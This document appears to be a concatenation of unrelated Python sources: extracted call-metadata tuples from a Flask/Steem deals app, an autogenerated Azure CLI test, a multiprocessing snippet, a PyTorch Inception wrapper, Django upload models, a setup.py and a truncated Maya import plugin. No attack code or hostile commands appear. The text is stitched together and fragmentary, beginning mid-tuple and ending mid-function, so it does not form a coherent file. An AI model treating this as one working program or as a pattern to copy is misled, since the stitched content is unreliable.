Response\n'), ((24369, 24418), 'flask.Response', 'Response', (['sitemap_xml'], {'mimetype': '"""application/xml"""'}), "(sitemap_xml, mimetype='application/xml')\n", (24377, 24418), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((5394, 5409), 'dateutil.parser.parse', 'parser.parse', (['t'], {}), '(t)\n', (5406, 5409), False, 'from dateutil import parser\n'), ((8872, 8941), 'flask.jsonify', 'jsonify', (["{'status': False, 'msg': 'please login and authorize first'}"], {}), "({'status': False, 'msg': 'please login and authorize first'})\n", (8879, 8941), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((9026, 9068), 'flask.jsonify', 'jsonify', (["{'username': session['username']}"], {}), "({'username': session['username']})\n", (9033, 9068), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((9095, 9120), 'flask.jsonify', 'jsonify', (["{'username': ''}"], {}), "({'username': ''})\n", (9102, 9120), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((13866, 13893), 'flask.render_template', 'render_template', (['"""404.html"""'], {}), "('404.html')\n", (13881, 13893), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((14107, 14123), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (14114, 14123), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((18244, 18289), 'flask.redirect', 'redirect', (["comment_form['return_to']"], {'code': '(302)'}), "(comment_form['return_to'], code=302)\n", (18252, 18289), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((22713, 22740), 'slugify.slugify', 'slugify', (["deal_form['brand']"], {}), "(deal_form['brand'])\n", (22720, 22740), False, 'from slugify import slugify\n'), ((23607, 23643), 'flask.render_template', 'render_template', (['"""submit_deals.html"""'], {}), "('submit_deals.html')\n", (23622, 23643), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((23664, 23680), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (23671, 23680), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((4124, 4295), 'steem.Steem', 'Steem', ([], {'nodes': "['https://rpc.buildteam.io', 'https://api.steemit.com',\n 'https://steemd.steemitstage.com']", 'keys': "[app.config['POSTING_KEY'], app.config['ACTIVE_KEY']]"}), "(nodes=['https://rpc.buildteam.io', 'https://api.steemit.com',\n 'https://steemd.steemitstage.com'], keys=[app.config['POSTING_KEY'],\n app.config['ACTIVE_KEY']])\n", (4129, 4295), False, 'from steem import Steem\n'), ((5252, 5288), 'traceback.print_exc', 'traceback.print_exc', ([], {'file': 'sys.stdout'}), '(file=sys.stdout)\n', (5271, 5288), False, 'import sys, traceback, json, textwrap, requests, pprint, time, math, arrow\n'), ((6102, 6114), 'datetime.date.today', 'date.today', ([], {}), '()\n', (6112, 6114), False, 'from datetime import date, timedelta, datetime\n'), ((6403, 6415), 'datetime.date.today', 'date.today', ([], {}), '()\n', (6413, 6415), False, 'from datetime import date, timedelta, datetime\n'), ((7325, 7361), 'json.loads', 'json.loads', (["content['json_metadata']"], {}), "(content['json_metadata'])\n", (7335, 7361), False, 'import sys, traceback, json, textwrap, requests, pprint, time, math, arrow\n'), ((8681, 8706), 'flask.jsonify', 'jsonify', (["{'status': True}"], {}), "({'status': True})\n", (8688, 8706), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((9407, 9429), 'flask.request.form.to_dict', 'request.form.to_dict', ([], {}), '()\n', (9427, 9429), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((10503, 10532), 'slugify.slugify', 'slugify', (["deal_update['brand']"], {}), "(deal_update['brand'])\n", (10510, 10532), False, 'from slugify import slugify\n'), ((11329, 11370), 'flask.render_template', 'render_template', (['"""update.html"""'], {'deal': 'deal'}), "('update.html', deal=deal)\n", (11344, 11370), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((11537, 11573), 'flask.render_template', 'render_template', (['"""login_failed.html"""'], {}), "('login_failed.html')\n", (11552, 11573), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((14259, 14295), 'flask.render_template', 'render_template', (['"""login_failed.html"""'], {}), "('login_failed.html')\n", (14274, 14295), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((15060, 15076), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (15067, 15076), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((15140, 15176), 'flask.render_template', 'render_template', (['"""login_failed.html"""'], {}), "('login_failed.html')\n", (15155, 15176), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((16111, 16127), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (16118, 16127), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((16191, 16227), 'flask.render_template', 'render_template', (['"""login_failed.html"""'], {}), "('login_failed.html')\n", (16206, 16227), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((16401, 16437), 'flask.render_template', 'render_template', (['"""login_failed.html"""'], {}), "('login_failed.html')\n", (16416, 16437), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((17050, 17221), 'steem.Steem', 'Steem', ([], {'nodes': "['https://rpc.buildteam.io', 'https://api.steemit.com',\n 'https://steemd.steemitstage.com']", 'keys': "[app.config['POSTING_KEY'], app.config['ACTIVE_KEY']]"}), "(nodes=['https://rpc.buildteam.io', 'https://api.steemit.com',\n 'https://steemd.steemitstage.com'], keys=[app.config['POSTING_KEY'],\n app.config['ACTIVE_KEY']])\n", (17055, 17221), False, 'from steem import Steem\n'), ((17971, 18007), 'traceback.print_exc', 'traceback.print_exc', ([], {'file': 'sys.stdout'}), '(file=sys.stdout)\n', (17990, 18007), False, 'import sys, traceback, json, textwrap, requests, pprint, time, math, arrow\n'), ((18324, 18340), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (18331, 18340), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((18445, 18481), 'flask.render_template', 'render_template', (['"""login_failed.html"""'], {}), "('login_failed.html')\n", (18460, 18481), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((21333, 21504), 'steem.Steem', 'Steem', ([], {'nodes': "['https://rpc.buildteam.io', 'https://api.steemit.com',\n 'https://steemd.steemitstage.com']", 'keys': "[app.config['POSTING_KEY'], app.config['ACTIVE_KEY']]"}), "(nodes=['https://rpc.buildteam.io', 'https://api.steemit.com',\n 'https://steemd.steemitstage.com'], keys=[app.config['POSTING_KEY'],\n app.config['ACTIVE_KEY']])\n", (21338, 21504), False, 'from steem import Steem\n'), ((22931, 22967), 'traceback.print_exc', 'traceback.print_exc', ([], {'file': 'sys.stdout'}), '(file=sys.stdout)\n', (22950, 22967), False, 'import sys, traceback, json, textwrap, requests, pprint, time, math, arrow\n'), ((23422, 23438), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (23429, 23438), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((3038, 3070), 'dateutil.parser.parse', 'parser.parse', (["deal['deal_start']"], {}), "(deal['deal_start'])\n", (3050, 3070), False, 'from dateutil import parser\n'), ((3216, 3246), 'dateutil.parser.parse', 'parser.parse', (["deal['deal_end']"], {}), "(deal['deal_end'])\n", (3228, 3246), False, 'from dateutil import parser\n'), ((5809, 5821), 'datetime.date.today', 'date.today', ([], {}), '()\n', (5819, 5821), False, 'from datetime import date, timedelta, datetime\n'), ((6439, 6451), 'datetime.date.today', 'date.today', ([], {}), '()\n', (6449, 6451), False, 'from datetime import date, timedelta, datetime\n'), ((7707, 7734), 'flask.render_template', 'render_template', (['"""404.html"""'], {}), "('404.html')\n", (7722, 7734), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((8356, 8527), 'steem.Steem', 'Steem', ([], {'nodes': "['https://rpc.buildteam.io', 'https://api.steemit.com',\n 'https://steemd.steemitstage.com']", 'keys': "[app.config['POSTING_KEY'], app.config['ACTIVE_KEY']]"}), "(nodes=['https://rpc.buildteam.io', 'https://api.steemit.com',\n 'https://steemd.steemitstage.com'], keys=[app.config['POSTING_KEY'],\n app.config['ACTIVE_KEY']])\n", (8361, 8527), False, 'from steem import Steem\n'), ((8790, 8844), 'flask.jsonify', 'jsonify', (["{'status': False, 'msg': 'unknown exception'}"], {}), "({'status': False, 'msg': 'unknown exception'})\n", (8797, 8844), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((11148, 11164), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (11155, 11164), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((14663, 14699), 'flask.render_template', 'render_template', (['"""login_failed.html"""'], {}), "('login_failed.html')\n", (14678, 14699), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((18174, 18190), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (18181, 18190), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((20086, 20123), 'dateutil.parser.parse', 'parser.parse', (["deal_form['deal_start']"], {}), "(deal_form['deal_start'])\n", (20098, 20123), False, 'from dateutil import parser\n'), ((20269, 20304), 'dateutil.parser.parse', 'parser.parse', (["deal_form['deal_end']"], {}), "(deal_form['deal_end'])\n", (20281, 20304), False, 'from dateutil import parser\n'), ((23131, 23153), 'flask.url_for', 'url_for', (['"""submit_page"""'], {}), "('submit_page')\n", (23138, 23153), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((23775, 23787), 'datetime.date.today', 'date.today', ([], {}), '()\n', (23785, 23787), False, 'from datetime import date, timedelta, datetime\n'), ((23790, 23808), 'datetime.timedelta', 'timedelta', ([], {'days': '(10)'}), '(days=10)\n', (23799, 23808), False, 'from datetime import date, timedelta, datetime\n'), ((3145, 3157), 'datetime.date.today', 'date.today', ([], {}), '()\n', (3155, 3157), False, 'from datetime import date, timedelta, datetime\n'), ((17895, 17906), 'time.time', 'time.time', ([], {}), '()\n', (17904, 17906), False, 'import sys, traceback, json, textwrap, requests, pprint, time, math, arrow\n'), ((20198, 20210), 'datetime.date.today', 'date.today', ([], {}), '()\n', (20208, 20210), False, 'from datetime import date, timedelta, datetime\n'), ((22112, 22123), 'time.time', 'time.time', ([], {}), '()\n', (22121, 22123), False, 'import sys, traceback, json, textwrap, requests, pprint, time, math, arrow\n'), ((22273, 22310), 'dateutil.parser.parse', 'parser.parse', (["deal_form['deal_start']"], {}), "(deal_form['deal_start'])\n", (22285, 22310), False, 'from dateutil import parser\n'), ((22462, 22497), 'dateutil.parser.parse', 'parser.parse', (["deal_form['deal_end']"], {}), "(deal_form['deal_end'])\n", (22474, 22497), False, 'from dateutil import parser\n'), ((3320, 3362), 'dateutil.parser.parse', 'parser.parse', (["deal_post_data['date_start']"], {}), "(deal_post_data['date_start'])\n", (3332, 3362), False, 'from dateutil import parser\n'), ((3365, 3383), 'datetime.timedelta', 'timedelta', ([], {'days': '(45)'}), '(days=45)\n', (3374, 3383), False, 'from datetime import date, timedelta, datetime\n'), ((10015, 10054), 'dateutil.parser.parse', 'parser.parse', (["deal_update['deal_start']"], {}), "(deal_update['deal_start'])\n", (10027, 10054), False, 'from dateutil import parser\n'), ((10226, 10263), 'dateutil.parser.parse', 'parser.parse', (["deal_update['deal_end']"], {}), "(deal_update['deal_end'])\n", (10238, 10263), False, 'from dateutil import parser\n'), ((20378, 20420), 'dateutil.parser.parse', 'parser.parse', (["deal_post_data['date_start']"], {}), "(deal_post_data['date_start'])\n", (20390, 20420), False, 'from dateutil import parser\n'), ((20423, 20441), 'datetime.timedelta', 'timedelta', ([], {'days': '(45)'}), '(days=45)\n', (20432, 20441), False, 'from datetime import date, timedelta, datetime\n'), ((22388, 22400), 'datetime.date.today', 'date.today', ([], {}), '()\n', (22398, 22400), False, 'from datetime import date, timedelta, datetime\n'), ((10142, 10154), 'datetime.date.today', 'date.today', ([], {}), '()\n', (10152, 10154), False, 'from datetime import date, timedelta, datetime\n'), ((22574, 22586), 'datetime.date.today', 'date.today', ([], {}), '()\n', (22584, 22586), False, 'from datetime import date, timedelta, datetime\n'), ((22589, 22607), 'datetime.timedelta', 'timedelta', ([], {'days': '(45)'}), '(days=45)\n', (22598, 22607), False, 'from datetime import date, timedelta, datetime\n'), ((10350, 10362), 'datetime.date.today', 'date.today', ([], {}), '()\n', (10360, 10362), False, 'from datetime import date, timedelta, datetime\n'), ((10365, 10383), 'datetime.timedelta', 'timedelta', ([], {'days': '(45)'}), '(days=45)\n', (10374, 10383), False, 'from datetime import date, timedelta, datetime\n'), ((11735, 11747), 'datetime.date.today', 'date.today', ([], {}), '()\n', (11745, 11747), False, 'from datetime import date, timedelta, datetime\n'), ((12854, 12866), 'datetime.date.today', 'date.today', ([], {}), '()\n', (12864, 12866), False, 'from datetime import date, timedelta, datetime\n'), ((13222, 13234), 'datetime.date.today', 'date.today', ([], {}), '()\n', (13232, 13234), False, 'from datetime import date, timedelta, datetime\n'), ((13573, 13585), 'datetime.date.today', 'date.today', ([], {}), '()\n', (13583, 13585), False, 'from datetime import date, timedelta, datetime\n'), ((24241, 24273), 'dateutil.parser.parse', 'parser.parse', (["deal['deal_start']"], {}), "(deal['deal_start'])\n", (24253, 24273), False, 'from dateutil import parser\n')] |
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import os
from azure.cli.testsdk import ScenarioTest
from .. import try_manual, raise_if, calc_coverage
from azure.cli.testsdk import ResourceGroupPreparer
from azure.cli.testsdk import StorageAccountPreparer
TEST_DIR = os.path.abspath(os.path.join(os.path.abspath(__file__), '..'))
# Env setup
@try_manual
def setup(test, rg, rg_2):
pass
# EXAMPLE: ServicePut
@try_manual
def step_serviceput(test, rg, rg_2):
# EXAMPLE NOT FOUND!
pass
# EXAMPLE: OperationResultsGet
@try_manual
def step_operationresultsget(test, rg, rg_2):
# EXAMPLE NOT FOUND!
pass
# EXAMPLE: ServiceGet
@try_manual
def step_serviceget(test, rg, rg_2):
# EXAMPLE NOT FOUND!
pass
# EXAMPLE: ServiceListByResourceGroup
@try_manual
def step_servicelistbyresourcegroup(test, rg, rg_2):
# EXAMPLE NOT FOUND!
pass
# EXAMPLE: ServiceList
@try_manual
def step_servicelist(test, rg, rg_2):
# EXAMPLE NOT FOUND!
pass
# EXAMPLE: OperationsList
@try_manual
def step_operationslist(test, rg, rg_2):
# EXAMPLE NOT FOUND!
pass
# EXAMPLE: ServicePatch
@try_manual
def step_servicepatch(test, rg, rg_2):
# EXAMPLE NOT FOUND!
pass
# EXAMPLE: CheckNameAvailabilityPost
@try_manual
def step_checknameavailabilitypost(test, rg, rg_2):
# EXAMPLE NOT FOUND!
pass
# EXAMPLE: ServiceDelete
@try_manual
def step_servicedelete(test, rg, rg_2):
# EXAMPLE NOT FOUND!
pass
# Env cleanup
@try_manual
def cleanup(test, rg, rg_2):
pass
# Testcase
@try_manual
def call_scenario(test, rg, rg_2):
setup(test, rg, rg_2)
step_serviceput(test, rg, rg_2)
step_operationresultsget(test, rg, rg_2)
step_serviceget(test, rg, rg_2)
step_servicelistbyresourcegroup(test, rg, rg_2)
step_servicelist(test, rg, rg_2)
step_operationslist(test, rg, rg_2)
step_servicepatch(test, rg, rg_2)
step_checknameavailabilitypost(test, rg, rg_2)
step_servicedelete(test, rg, rg_2)
cleanup(test, rg, rg_2)
@try_manual
class HealthcareApisManagementClientScenarioTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='clitesthealthcareapis_rgname'[:7], key='rg', parameter_name='rg')
@ResourceGroupPreparer(name_prefix='clitesthealthcareapis_rg1'[:7], key='rg_2', parameter_name='rg_2')
@StorageAccountPreparer(name_prefix='clitesthealthcareapis_existingStorageAccount'[:7], key='sa',
resource_group_parameter_name='rg')
def test_healthcareapis(self, rg, rg_2):
self.kwargs.update({
'myPrivateEndpointConnection': 'myConnection',
})
call_scenario(self, rg, rg_2)
calc_coverage(__file__)
raise_if()
| [
"os.path.abspath",
"azure.cli.testsdk.StorageAccountPreparer",
"azure.cli.testsdk.ResourceGroupPreparer"
] | [((2507, 2612), 'azure.cli.testsdk.ResourceGroupPreparer', 'ResourceGroupPreparer', ([], {'name_prefix': '"""clitesthealthcareapis_rgname"""[:7]', 'key': '"""rg"""', 'parameter_name': '"""rg"""'}), "(name_prefix='clitesthealthcareapis_rgname'[:7], key=\n 'rg', parameter_name='rg')\n", (2528, 2612), False, 'from azure.cli.testsdk import ResourceGroupPreparer\n'), ((2613, 2719), 'azure.cli.testsdk.ResourceGroupPreparer', 'ResourceGroupPreparer', ([], {'name_prefix': '"""clitesthealthcareapis_rg1"""[:7]', 'key': '"""rg_2"""', 'parameter_name': '"""rg_2"""'}), "(name_prefix='clitesthealthcareapis_rg1'[:7], key=\n 'rg_2', parameter_name='rg_2')\n", (2634, 2719), False, 'from azure.cli.testsdk import ResourceGroupPreparer\n'), ((2720, 2861), 'azure.cli.testsdk.StorageAccountPreparer', 'StorageAccountPreparer', ([], {'name_prefix': '"""clitesthealthcareapis_existingStorageAccount"""[:7]', 'key': '"""sa"""', 'resource_group_parameter_name': '"""rg"""'}), "(name_prefix=\n 'clitesthealthcareapis_existingStorageAccount'[:7], key='sa',\n resource_group_parameter_name='rg')\n", (2742, 2861), False, 'from azure.cli.testsdk import StorageAccountPreparer\n'), ((710, 735), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (725, 735), False, 'import os\n')] |
import multiprocessing
def sum_up_to(number):
return sum(range(1, number + 1))
if __name__ == '__main__':
# Create pool object
pool = multiprocessing.Pool(4)
# Run `sum_up_to` 10 times simultaneously
result = pool.map(sum_up_to, range(10))
print(result) | [
"multiprocessing.Pool"
] | [((152, 175), 'multiprocessing.Pool', 'multiprocessing.Pool', (['(4)'], {}), '(4)\n', (172, 175), False, 'import multiprocessing\n')] |
import torch
import torch.nn as nn
from torch.nn import Parameter as P
from torchvision.models.inception import inception_v3
import torch.nn.functional as F
# Module that wraps the inception network to enable use with dataparallel and
# returning pool features and logits.
class WrapInception(nn.Module):
def __init__(self, net):
super(WrapInception,self).__init__()
self.net = net
self.mean = P(torch.tensor([0.485, 0.456, 0.406]).view(1, -1, 1, 1),
requires_grad=False)
self.std = P(torch.tensor([0.229, 0.224, 0.225]).view(1, -1, 1, 1),
requires_grad=False)
def forward(self, x):
x = (x - self.mean) / self.std
# Upsample if necessary
if x.shape[2] != 299 or x.shape[3] != 299:
x = F.interpolate(x, size=(299, 299), mode='bilinear', align_corners=True)
# 299 x 299 x 3
x = self.net.Conv2d_1a_3x3(x)
# 149 x 149 x 32
x = self.net.Conv2d_2a_3x3(x)
# 147 x 147 x 32
x = self.net.Conv2d_2b_3x3(x)
# 147 x 147 x 64
x = F.max_pool2d(x, kernel_size=3, stride=2)
# 73 x 73 x 64
x = self.net.Conv2d_3b_1x1(x)
# 73 x 73 x 80
x = self.net.Conv2d_4a_3x3(x)
# 71 x 71 x 192
x = F.max_pool2d(x, kernel_size=3, stride=2)
# 35 x 35 x 192
x = self.net.Mixed_5b(x)
# 35 x 35 x 256
x = self.net.Mixed_5c(x)
# 35 x 35 x 288
x = self.net.Mixed_5d(x)
# 35 x 35 x 288
x = self.net.Mixed_6a(x)
# 17 x 17 x 768
x = self.net.Mixed_6b(x)
# 17 x 17 x 768
x = self.net.Mixed_6c(x)
# 17 x 17 x 768
x = self.net.Mixed_6d(x)
# 17 x 17 x 768
x = self.net.Mixed_6e(x)
# 17 x 17 x 768
# 17 x 17 x 768
x = self.net.Mixed_7a(x)
# 8 x 8 x 1280
x = self.net.Mixed_7b(x)
# 8 x 8 x 2048
x = self.net.Mixed_7c(x)
# 8 x 8 x 2048
pool = torch.mean(x.view(x.size(0), x.size(1), -1), 2)
# 1 x 1 x 2048
logits = self.net.fc(F.dropout(pool, training=False).view(pool.size(0), -1))
# 1000 (num_classes)
return pool, logits
# Load and wrap the Inception model
def load_inception_net(parallel=False):
inception_model = inception_v3(pretrained=True, transform_input=False)
inception_model = WrapInception(inception_model.eval()).cuda()
if parallel:
inception_model = nn.DataParallel(inception_model)
return inception_model
| [
"torchvision.models.inception.inception_v3",
"torch.nn.DataParallel",
"torch.nn.functional.dropout",
"torch.tensor",
"torch.nn.functional.interpolate",
"torch.nn.functional.max_pool2d"
] | [((2340, 2392), 'torchvision.models.inception.inception_v3', 'inception_v3', ([], {'pretrained': '(True)', 'transform_input': '(False)'}), '(pretrained=True, transform_input=False)\n', (2352, 2392), False, 'from torchvision.models.inception import inception_v3\n'), ((1101, 1141), 'torch.nn.functional.max_pool2d', 'F.max_pool2d', (['x'], {'kernel_size': '(3)', 'stride': '(2)'}), '(x, kernel_size=3, stride=2)\n', (1113, 1141), True, 'import torch.nn.functional as F\n'), ((1300, 1340), 'torch.nn.functional.max_pool2d', 'F.max_pool2d', (['x'], {'kernel_size': '(3)', 'stride': '(2)'}), '(x, kernel_size=3, stride=2)\n', (1312, 1340), True, 'import torch.nn.functional as F\n'), ((2503, 2535), 'torch.nn.DataParallel', 'nn.DataParallel', (['inception_model'], {}), '(inception_model)\n', (2518, 2535), True, 'import torch.nn as nn\n'), ((805, 875), 'torch.nn.functional.interpolate', 'F.interpolate', (['x'], {'size': '(299, 299)', 'mode': '"""bilinear"""', 'align_corners': '(True)'}), "(x, size=(299, 299), mode='bilinear', align_corners=True)\n", (818, 875), True, 'import torch.nn.functional as F\n'), ((425, 460), 'torch.tensor', 'torch.tensor', (['[0.485, 0.456, 0.406]'], {}), '([0.485, 0.456, 0.406])\n', (437, 460), False, 'import torch\n'), ((544, 579), 'torch.tensor', 'torch.tensor', (['[0.229, 0.224, 0.225]'], {}), '([0.229, 0.224, 0.225])\n', (556, 579), False, 'import torch\n'), ((2128, 2159), 'torch.nn.functional.dropout', 'F.dropout', (['pool'], {'training': '(False)'}), '(pool, training=False)\n', (2137, 2159), True, 'import torch.nn.functional as F\n')] |
from django.db import models
from django.utils.translation import gettext_lazy as _
from paper_uploads.models import *
from paper_uploads.cloudinary.models import *
__all__ = [
"CustomUploadedFile",
"CustomUploadedImage",
"CustomCloudinaryFile",
"CustomProxyGallery",
"CustomGallery",
"CustomCloudinaryGallery",
]
# =========== Proxy models ==================
class CustomUploadedFile(UploadedFile):
class Meta:
proxy = True
def get_file_folder(self) -> str:
return "custom-files/%Y"
class CustomUploadedImage(UploadedImage):
class Meta:
proxy = True
def get_file_folder(self) -> str:
return "custom-images/%Y"
class CustomProxyImageItem(ImageItem):
class Meta:
proxy = True
def get_file_folder(self) -> str:
return "collections/custom-images/%Y"
class CustomCloudinaryFile(CloudinaryFile):
class Meta:
proxy = True
def get_file_folder(self) -> str:
return "custom-files/%Y"
# =========== Concrete models ==================
class CustomImageItem(ImageItemBase):
caption = models.TextField(_("caption"), blank=True)
def get_file_folder(self) -> str:
return "collections/custom-images/%Y"
class CustomCloudinaryImageItem(CloudinaryImageItemBase):
caption = models.TextField(_("caption"), blank=True)
def get_file_folder(self) -> str:
return "collections/custom-images/%Y"
class CustomProxyGallery(ImageCollection):
VARIATIONS = dict(
desktop=dict(
size=(1200, 0),
clip=False,
)
)
image = CollectionItem(CustomProxyImageItem)
class CustomGallery(ImageCollection):
VARIATIONS = dict(
desktop=dict(
size=(1200, 0),
clip=False,
)
)
image = CollectionItem(CustomImageItem)
class CustomCloudinaryGallery(CloudinaryImageCollection):
image = CollectionItem(CustomCloudinaryImageItem)
| [
"django.utils.translation.gettext_lazy"
] | [((1133, 1145), 'django.utils.translation.gettext_lazy', '_', (['"""caption"""'], {}), "('caption')\n", (1134, 1145), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1335, 1347), 'django.utils.translation.gettext_lazy', '_', (['"""caption"""'], {}), "('caption')\n", (1336, 1347), True, 'from django.utils.translation import gettext_lazy as _\n')] |
# -*- coding: utf-8 -*-
"""setup.py: setuptools control."""
from setuptools import setup
setup(name='xyz2rast',
version='0.1.1',
description='Gridding algorithm for time series XYZ data',
url='https://github.com/tashley/xyz2rast.git',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
packages=['xyz2rast'],
zip_safe=False)
| [
"setuptools.setup"
] | [((94, 353), 'setuptools.setup', 'setup', ([], {'name': '"""xyz2rast"""', 'version': '"""0.1.1"""', 'description': '"""Gridding algorithm for time series XYZ data"""', 'url': '"""https://github.com/tashley/xyz2rast.git"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'license': '"""MIT"""', 'packages': "['xyz2rast']", 'zip_safe': '(False)'}), "(name='xyz2rast', version='0.1.1', description=\n 'Gridding algorithm for time series XYZ data', url=\n 'https://github.com/tashley/xyz2rast.git', author='<NAME>',\n author_email='<EMAIL>', license='MIT', packages=['xyz2rast'], zip_safe=\n False)\n", (99, 353), False, 'from setuptools import setup\n')] |
# The MIT License
#
# Copyright (c) 2008 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys
import gc
import maya.OpenMaya as OpenMaya
import maya.OpenMayaMPx as OpenMayaMPx
import maya.cmds as mc
import ns.py
import ns.py.Errors
import ns.maya.msv
import ns.bridge.io.MasReader as MasReader
import ns.bridge.data.Scene as Scene
import ns.bridge.data.Sim as Sim
import ns.maya.msv.MayaSkin as MayaSkin
import ns.maya.msv.MayaSim as MayaSim
import ns.maya.msv.MayaAgent as MayaAgent
import ns.maya.msv.MayaSimAgent as MayaSimAgent
kName = "msvSimImport"
kSimDirFlag = "-sd"
kSimDirFlagLong = "-simDir"
kSimTypeFlag = "-st"
kSimTypeFlagLong = "-simType"
kMasFileFlag = "-mas"
kMasFileFlagLong = "-masFile"
kCallsheetFlag = "-cal"
kCallsheetFlagLong = "-callsheet"
kLoadGeometryFlag = "-lg"
kLoadGeometryFlagLong = "-loadGeometry"
kSkinTypeFlag = "-skt"
kSkinTypeFlagLong = "-skinType"
kLoadSegmentsFlag = "-ls"
kLoadSegmentsFlagLong = "-loadSegments"
kLoadMaterialsFlag = "-lm"
kLoadMaterialsFlagLong = "-loadMaterials"
kMaterialTypeFlag = "-mt"
kMaterialTypeFlagLong = "-materialType"
kFrameStepFlag = "-fs"
kFrameStepFlagLong = "-frameStep"
kInstanceSegmentsFlag = "-is"
kInstanceSegmentsFlagLong = "-instanceSegments"
kSelectionFlag = "-sel"
kSelectionFlagLong = "-selection"
kCacheGeometryFlag = "-cg"
kCacheGeometryFlagLong = "-cacheGeometry"
kDeleteSkeletonFlag = "-ds"
kDeleteSkeletonFlagLong = "-deleteSkeleton"
kCacheDirFlag = "-cd"
kCacheDirFlagLong = "-cacheDir"
kRangeFlag = "-r"
kRangeFlagLong = "-range"
kAnimTypeFlag = "-at"
kAnimTypeFlagLong = "-animType"
class MsvSimImportCmd( OpenMayaMPx.MPxCommand ):
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
def isUndoable( self ):
return False
def _parseArgs( self, argData ):
options = {}
if argData.isFlagSet(kSimDirFlag):
options[kSimDirFlag] = argData.flagArgumentString(kSimDirFlag, 0 )
else:
options[kSimDirFlag] = ""
if argData.isFlagSet(kSimTypeFlag):
options[kSimTypeFlag] = ".%s" % argData.flagArgumentString(kSimTypeFlag, 0)
else:
options[kSimTypeFlag] = ".amc"
if argData.isFlagSet(kMasFileFlag):
options[kMasFileFlag] = argData.flagArgumentString(kMasFileFlag, 0)
else:
raise ns.py.Errors.BadArgumentError("The %s/%s flag is required" % (kMasFileFlagLong, kMasFileFlag))
if argData.isFlagSet(kCallsheetFlag):
options[kCallsheetFlag] = argData.flagArgumentString(kCallsheetFlag, 0)
else:
options[kCallsheetFlag] = ""
if argData.isFlagSet(kLoadGeometryFlag):
options[kLoadGeometryFlag] = argData.flagArgumentBool(kLoadGeometryFlag, 0)
else:
options[kLoadGeometryFlag] = True
if argData.isFlagSet( kSkinTypeFlag ):
str = argData.flagArgumentString( kSkinTypeFlag, 0 )
if (str == "smooth"):
options[kSkinTypeFlag] = MayaSkin.eSkinType.smooth
elif (str == "duplicate"):
options[kSkinTypeFlag] = MayaSkin.eSkinType.duplicate
